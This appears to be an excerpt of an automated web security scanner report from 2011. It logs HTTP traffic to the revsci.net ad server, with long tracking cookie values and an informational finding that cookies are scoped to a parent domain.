rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_--QM="MLsXrqMOJjhroJB0OsFGTywSQa5gE3bzGLWC77EYlL0V6PUwpFqMKfRo/WIjxatotGUBLfh18Iw7W+qkAQ46bVHoTrv1pQwNKjjgNCNHJPbpAgH4IzR/+iRbVue91oXW/jKsDPa7vbvxtrd33fHq34yrFQuJku+bgm+8EVffudcKN4iuBvrN90qHeI4xaY/Q1W1yNsL5KOlsGxNqhUiNOXe5nn986aJ67S/0tULtWPdrG3lhpPsdb8xO/n/lB581aDn762WB0ihbZBOeu3Ufx+HpLRh+8Hbf0zZq8pfGKCS0hlRrIAabwnKXGJwRIMywuWQPjThCbo0KSSFQIP4mo76IAHMZnYNH0tuqRyB/AEZngSZCLfLYF3Zs5g4nZoGO0cohFtEneaCcGDtskRpSY+dP7h0gnUP0L7R7A/8xlqSZ/W2KkRpVIhjwQAOTk48sJD1PxXjX0x5XdtsfLihcm9VuIUiHpGRUF7F/idal7Hq+0pROgbBT6KCcol1snnTV0V5F0xpBZk6CRy2ugCPvNan6L1McQFvgbXEKldtpFMfuZakR635XR4x1RXCLCkkxUCfQPGc6mBZWiKgoRHEO3b0otALBdNCIIFAiSKxefi0nPrtknQ3EMXhwwvPIzXKIQsOaoEWNpAIcShIHiDOF3qSKWFuDqkb2jqtMxvBdfAVFP7NcbvzKM+3/ueqaVRMDxCeeJ+flWQpzF+qS4BrI4Dt7AUZJ2EeFM4m41UyM+T7FSi5tA/qwqOwo4kK2gHpUVKssP2I+Ee7LhGobkwOJUOMfgbzVozWgQuSKoq5kZ88M185NbAGUupiqDKHqMcj+dBKc9fPP3KK+5EXLdrvEPS5YK+cSdBxxlTzlrYRJ3wJXAiV2dnrBaaQP+zIJOpgPpvL1xtxxrkjB56lwuYrzB2bgI6uI/AireNneSB71/kJavLpmOV3ZKyXlMBYkfyXB8qTG0Uev1gg9C57Wn8epqz8lCu0573dEnu71OAvS2jhxt+Kw6FPI+tTiLCxWwwjS81QgDUZk9v3k6axNYh2OWMWlOaV+U8pWNdAebenCcqc="; rsi_us_1000000="pUM1Iz9HMAYU1O2uQ6agQvHtomeq75Ig4g4EmJ/A6n4WsknjQhUq8iBul7F68iFx8cqm3SO9eaFvyn1GBw/eJPslZlA8PhpTTZGsXb7RjDc/iMgnjkeolupj4fLTEQPVKscYxoDVuEdJuZbaK3D9xPuOIhlowTJ+ya38j5p4Ta6Bz/HWeH0nosUPna7vHxaZ5XoL5l/dnmXwpPm5VWpbUOslRA5BxSe4ZOkSE9PAmD2iQJPexlX0wmcIAbK7tsGmzGATNf80Fqyl751/l8juNUu0JNYEx45nWIRv/C8BOiTiJbO5g8IGAzpcI40V+UQZmhqEPeeEc1fCQnI0TCPjgkID7R2wwigMSHt5VUBgTb+NyMxPLwLONDY3TuokJnmzHPnnRDkuVRiS5+Uyz4YpGNKGlhaPSdZ9n4EB3wX0uvpMSNK4Fmo9jIaSj+ncTHidAXiIgQDfusP6TCa9QdU2bznEQzcv9BCophz20fJ1WW+kENTBipABVnZA56YjECEEY3phD1JQzHGdVrVseyuEk6GWi92FSiGLJ4812+Br34U7q3VQBxTRSEt04mb9b+Nu053VTtbctHkK68djsAFkE74d8kPDFLOH8lRboZwLXX6HqUXD02RKMs5PWsH+ziouWDQYmVb8hZ/ecArQiVYBI4aPw+kfQuXmbioB2aEC0lxOEpHD/Ns9MsBpCzc5UqHnCYeRcpcYLhhYm4BPjPFrgYw8D4NABb/5+fzD8h2U3LvMxcVcLWdaMX4aKoPVH+KL74p/EdmylBc1de/czv/dSpACqyj0uifAEyPR50aV9cwCBjohIoFo9EOMVH6RMd7onZ55R4I4FSIgeCRK0c4wgNxjTMXno77nWOf381e4nnQbO463zH1b2jgH0FmsgwCxBKR5LsbHEUqdx0oVuJzssP3YK75lqpQheuu3QYCc6leVSJ0morqXGrRuMXQbQrgyVMCQgz3qL/OFP/kN/cJMZe6ViH5t1Gdp7bjk4yCudY/fH/RWKgw9ywS7g4LBjxX2XrVDkyrkyMkUeGj92tKDN3nwYWN2isOHQc0tZtLOL/8WEUOseW6PUtOc7HPHXkhurCilOyFhqPwtVkrNV9iwiE6/OEwXFDX/aXR9ceCoOAiQkffNc/FhNzpBQE1u8u3E6JnrXkfFsNN0SqpfDvGaQnlA5yxO+k/zo/hv8QT1f8yC4/H0b0V3oZQU62XPrD2wB5Kv4sv8RmzGKE7qz8BL2mQX29agkU8ECTuBwmAb6UIzgDgLdezAM7zWMEN9lNvnbyEhVz4KlJteKeaP6JM8QWkSqGwqE4JwqHmmDFepCsQRHRGrBiMwJA76NRpMK59CxAt0fbzHEYqA+JmFKmMDiGhSr7vA0le7ggiHcPnY4yw16dWwbcJEsbg9ulXJ4JGMYgnw7KoKzVD4RSJBC230sX+mBeGHoQSxN08MTZ+4NCxPZspf/4y9JLqybhHYnhyK+r/gBv5lHBLh2Qjg3gH9Ms4jvQ6ewPsqEIGFdCBtnIuWzVKiX5T6glm3a6fLZrlR/OoU"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7Gnt="MLsXrqEO5ihr4JB0esFCP3iNF+pqmlub49aGmOkZz5qg3MoTcqeWbmliBEBiXf5iQVJEExBOdq4FjLd2iQGfFfRL/ql3vrzlT19lOKExbhBpGeSZT/oLCk2e4ffVgY0aDJ1uvtvUub/FrtByJKJuLfZer6ZFcp297ersMcCKWDghV0ndvnIp0ubN9s+L4XcV4gqUaLHaTBCzh59PWcCdqx5qql2sm+3+Fsp134KHZC+10dxmr/h2YPgrCQqlE1efdhVBy1mZ7UI9etUD9Q2vo2HKLKfq9HTRcMF7gvVBk6CX9dJqUNISrnFRzxK9I16Ze3gfnZMoYTvLGxzAujjGYgCBQHydRq3NVcxWHFqhjRyDYKMOimyVpBK/ej4cUFyMPuBapiZYAS+rRHNi2ReS4mBcOdI+kc0Sund6Oo8hlry4ImUOmhdRINCA6C7zqOTFINl5xGgXWwxPdANsISvg71h8oO6xP2wQVtZweTd2T3K400B4YdU0OCBbecxvUFE5I4HLNnVvO62maFGwXjcgxZKAa5SsW8dHk66Y8GjRMAd94ILbDGnKfs4wZh2R1y74X41joKW4WyD6hz1th/jdD24csANgpYVTf+WvMJhk1XuGdB6Vk+pz2NkjdsC8jwl3PNW7yoxWnby31j++1k5brdu2yrelw8/600dTtJ3lbwNhQ8ZUclNZ1PsBaUFiBUyiyKvQ/P8KE/i9La90q8j9I0CiOV/wwv7LKH1NeeF7MZAWFMOky8fZGQEYBHHqHh9HItYcPRDJHYaAKfPXRfVi4xpD3YJaeN9hBgfCu1SVahEpxVEQAokzPDcGLmCaxJqxlQqLLbD8hW1oHweNYdgZUHp5QuKXDFYpUoZLVaqngTPm5fO1BA8OSKZDjMsQ7Fe1GUPgTzic8rAfX1VwOlHBDBDTT3SuyF8e7ai7LUsohv0VtOqoZvYupIjAFDPeAac5Rc3MXPsEPgOLDDba3hNstl+qzh6YnF2zZ/ikkzOk+kEjNEJwcyXDQP/6gF24TmkWLEwF4enQzCwKzN7gC11i85xkhK0/fqO5EaF1RsVX3c+rfizRIYPFcsw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUNFIz1H8Bcc1M2QQ6eoQtXsImOq5xMg6w5HyyqatgLAr7yjOUThNYktpeAHrY+3W/Rk6NTESS4BwdCr1eHt/9ZkNKrCo6s3fabpmNBDwjRy3TGbk1xeK9kSMFgtwIuKczX4GzBspBjAuZwMmhoplDJh7A9z6RiBOinwtBeHiVcN0i6v6Gm1sxfd5xp1wuCF5WZs9kbwlWvr4NZ3g93GtCPa+q1U3LVpSvRK0UuludpVgBkLBr6GmT6i4WYYMVSbP5sllrENJ/vgWFptkkKA7v52VrZ6nH3vXNoHtOYAS2yJ/FfDyNCCwb6Rxtu5T0QGEEygc1Vek+zD8vsvm9Z7ts8y8DzrWIA+L6QbtLqvJ1Cu2xPMZlUdb1O4zSJ4vc7AcDWyHZMX8gZj5tAemXjKW8wO3jOPJ7SmwxzcAo3WdFavBofRh8t0E3uHrsAcrQpcSPbVqbGt1e3/UyCFwCzFUuTUmlrNmPxLnvnZmtxVaM9316IQRVs837aGn0ks1oedN0p6hUxDsaJ5ZBVmHNpHHdeedyHrWjyJ/1wyX4wJNVgeXnsM6ilSJ3Ehvf4UokF6eCfynXmVi5tEPblDsKdz0gLUKCQ7cr6/s6b69jA8zc9QRWdxKca2+RWxPviS6c2h8wrj2rf0tEuORJ+Uwb4rey9qg25EyXxss4pPjjnAeJPw3/YUbvxzjKPX3JmMyogSlfJWxMxdcQbHoHZ3cnZ8CMXsUBZo05Zu82Flj6Tc5xYaiJg+9o4I3Ey7XhuyLiwT+eQRLlYwuETrot957yBew0Fkj4RBLqUmAXrvKhR4XNwVEz7IrlWvUBo7qrGSAA4dV4jLZ4SCzPY2e4jS5ZlzqWWkpG84+clO4BXnB8T5fSwN1hMufzM8cWn5qssUwcRHMfxSMzEQnVELAXWCD8XnFM+O7bXi4tiDjcdFxbASSHfZ0DPfirZ0GrtvPfp4GUxJ4EUP+Q7f0JGdYf85bX7yQR8UTpizWaDf4nx9WmSWQZBYoaRX4DPO8mDn02s2/XeR66dS3pVwhC/nBXLMs+noD9+3NjceioQX93XzXW+hZpbrmpDbxL1My5MSRv1RW1FbhrAV0YFG9Hrw5avHRu2vgsXJwtswcKQduxCXN3reGFDYnE/twZvGMzFBwE1u7u1EapnsTifVMDN1TqhDHs4EQZlCK8dfAamWdz2neAXn7Ag2QqcwNPO3UXWSBKDhR2XfX9GpGrRip1xv3ueUAiS6sEHA273xIgUgU6sdyErUVLQlqA1SGUq49shVhg8wrY3AEtHacnZrP3WYzFgPaFMrp37rlYYy8zb0Scsdi6aQPsE9Urkf1agfH0Uty6V30sefD+k2ZMM2eNWsW6oKjWcTeeU85I6hwZmo+dvhtl0gi4GgJH2E3QBQfS8RoKgYr8TZ0GBaDo2K/Zj7eWLxDGt0it+hDeFnGhRSYPFLVEKrcTnbp+N+ufxGpgs42aKc47x3NAkbyo4UlDHYpZ8R6Hg+Iw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:58 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.11. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-1044587-596291-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==; rsiPus_xqR7="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIshOB9JrGlJ9XZP2PSMq545hyVBVJdSnkgvS5ixQ2jzsY0ZWA+JOFBhqviZCWubV71mmTZ/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJ61W1sllb6Nc3moNgaTi0sWkkQCbNz7hXNo2IsC53dW3VuuZsmJb9X0AgiDcheSzlnAsnUq4LYdtCMaskgIpbgmkSHb9PrS66rT7Grgzql7HtldL8iE5xypWITXabh97tTpkU/qmOFPl2cWsADKk2Rc1gNqCs/wCa2GpcRYzsBBlGWu1Rx6Ss0719jAJPt3A0/cgXMK9v1+nMWxleyRS9Py7rbiFbkbA4dy82s+YNiWD1Bp0B/8YPQvjz5m6VsPK2bApJbudN0kRmgDQwBFdNYNT3Zod7YBYp+BG3MVnzNBbnI+yHUMxY8gaTCU7GSuHnVmZTUzeXLyNzdjGXICYBnSWVVzTm1uYa+UU29wqPQ14C9Ay7tt6GPEWSA5zQxfYzeLi20J0Nl7IC6vXnM8Od1ipWmbzVPXl7hr95e/RGmwPBkmqRC5aamjDudjkvgSbR3b42ft+lD1GQzV25ioqJNKAAsRVoMjgqHOtgRDBe0DOKYrT+tMQWMGn6nEChsmBKyFveyHmvauyQe182HvP5WE9xxj/WW1VFGrZH10B6y51pelmZhY2yUVhLbCHFAF1wgg9I1NLCQ22j9FIDUznCf6vIcdZKG8/ZdiKwDfKAnA8AB53vXcXDFW+bqz0Qi9tJP3HFnfYb06h1kepNXQWZKlZVW8wLE6GcYgBaTn7Edmli85qT4S83vxtkUUbMAtf+b0E1nSeX3q+qrQ2YpBw97usUXF9qEw1Kga7ue4/koD8yQel/qNlEjame/tLJ0jduVB+ytBY9sF93mgbUlL2ZeG9dCIkZ+m+iWAynUZGRAG3mH4zdRt6QJFtJnrSudJUxkSp36hMpMqoyWjYf/0Dzxx8sSoHwbQLc7K4XYWzwFKXoqtXqULfas/iA=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeon8inPHPsPHufQb0id4nnMJw2upjcbtYuTDvN446mDNk0rjriNSbgDKZc06/pZLd8/z5IM1+qarydvJImOaUCavF5tQ+vJTy0vmLIKK5JakfcZvZ6vY5TRBbUhvbhTFBLWagpBIVk9PAmF2iRJOeh7n11Dcn8bkilhzvJuOwSrWjLV4c1dKSmGQXQgUCCrlrfg5dBoy/uKX5D/DErzUQPBw5wzlcHY0pwcQ4ohqHveeUO1fCklYt3yNLi8Ih4fiXA7KtiQmAv01haIfBqzbc3dy7UBOXBFA5UQx+zZY6T+r0AEWHCqu9zrcpE/K+dhafAfZdl6F9XwAK29pKStK8Vmo/hIZWj6P4pKDIwHnsIzs/CsI6oGdONCs57jOPg55C+8Eo4w2eN8X6XGvloOwC16CAbvKgsBHdOES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafiVSeTecIJRVt18r+Pf6AVQ9smmgMCZPjqwiXHhyXFqLJwepQkHnViNF27BPMR76afEDXmQK4X5YtD+7lbiGoEtKEsos76lXkFDeXHHplOgEvw0R+YSyi6fZVTgUbyYjzKicP8ItTRSjGP+9wmw4+6